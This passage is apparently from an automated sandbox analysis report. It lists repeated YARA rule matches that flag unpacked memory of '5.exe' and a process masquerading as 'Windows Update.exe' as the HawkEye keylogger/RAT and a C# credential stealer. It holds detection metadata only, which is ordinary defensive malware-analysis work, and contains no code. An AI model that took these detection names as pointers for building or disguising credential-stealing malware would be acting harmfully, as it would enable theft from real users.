          Source: 10.2.Windows Update.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.41b460.20.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.41b460.20.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.0.Windows Update.exe.41b460.20.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.41ce65.17.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.41ce65.17.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.5.exe.28cb12c.4.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.0.Windows Update.exe.38c9660.23.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.38c9660.23.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.0.Windows Update.exe.38c9660.23.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 2.1.5.exe.415058.3.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 2.1.5.exe.415058.3.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 2.1.5.exe.415058.3.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.5.exe.41ce65.15.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 2.0.5.exe.41ce65.15.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.38cb065.24.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.38cb065.24.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.2.Windows Update.exe.415058.2.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.2.Windows Update.exe.415058.2.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.2.Windows Update.exe.415058.2.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.5.exe.148b9265.2.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 1.2.5.exe.148b9265.2.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.5.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 2.0.5.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 2.0.5.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.2.Windows Update.exe.49cf428.11.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.2.Windows Update.exe.49cf428.11.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.2.Windows Update.exe.49cf428.11.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.41b460.10.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.41b460.10.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.0.Windows Update.exe.41b460.10.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.2.Windows Update.exe.41b460.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.2.Windows Update.exe.41b460.1.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.2.Windows Update.exe.41b460.1.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.0.Windows Update.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.4b3fa72.36.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.4b3fa72.36.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.5.exe.4b7fa72.16.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 2.2.5.exe.4b7fa72.16.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.7610000.38.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 2.2.5.exe.386b065.7.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 2.2.5.exe.386b065.7.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.4a50000.30.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.4a50000.30.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.0.Windows Update.exe.4a50000.30.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.415058.41.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.415058.41.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.0.Windows Update.exe.415058.41.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.5.exe.4aedc72.13.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 2.2.5.exe.4aedc72.13.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.Windows Update.exe.147a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 6.2.Windows Update.exe.147a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 6.2.Windows Update.exe.147a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.38c3258.25.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.38c3258.25.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.0.Windows Update.exe.38c3258.25.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.5.exe.3869660.5.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 2.2.5.exe.3869660.5.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 2.2.5.exe.3869660.5.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.4ae0000.33.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.4ae0000.33.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.0.Windows Update.exe.4ae0000.33.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.5.exe.148a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 1.2.5.exe.148a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 1.2.5.exe.148a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.49d0e2d.49.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.49d0e2d.49.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.1.Windows Update.exe.41ce65.2.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.1.Windows Update.exe.41ce65.2.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.38c9660.45.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.38c9660.45.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.0.Windows Update.exe.38c9660.45.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.Windows Update.exe.147b1458.4.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 6.2.Windows Update.exe.147b1458.4.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 6.2.Windows Update.exe.147b1458.4.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.4a26c92.27.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.4a26c92.27.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.5.exe.148b7860.3.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 1.2.5.exe.148b7860.3.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 1.2.5.exe.148b7860.3.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.75c0000.59.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.0.Windows Update.exe.4ae9c0d.57.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.4ae9c0d.57.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.41ce65.15.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.41ce65.15.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.5.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 2.0.5.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 2.0.5.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.1.Windows Update.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.1.Windows Update.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.1.Windows Update.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.5.exe.148a0000.1.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 1.2.5.exe.148a0000.1.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 1.2.5.exe.148a0000.1.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.2.Windows Update.exe.38cb065.8.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.2.Windows Update.exe.38cb065.8.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.41b460.16.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.41b460.16.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.0.Windows Update.exe.41b460.16.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.5.exe.415058.16.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 2.0.5.exe.415058.16.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 2.0.5.exe.415058.16.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.400000.19.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.400000.19.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.0.Windows Update.exe.400000.19.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.4aadc72.31.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.4aadc72.31.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.2.Windows Update.exe.7610000.21.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.2.Windows Update.exe.4ae0000.16.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
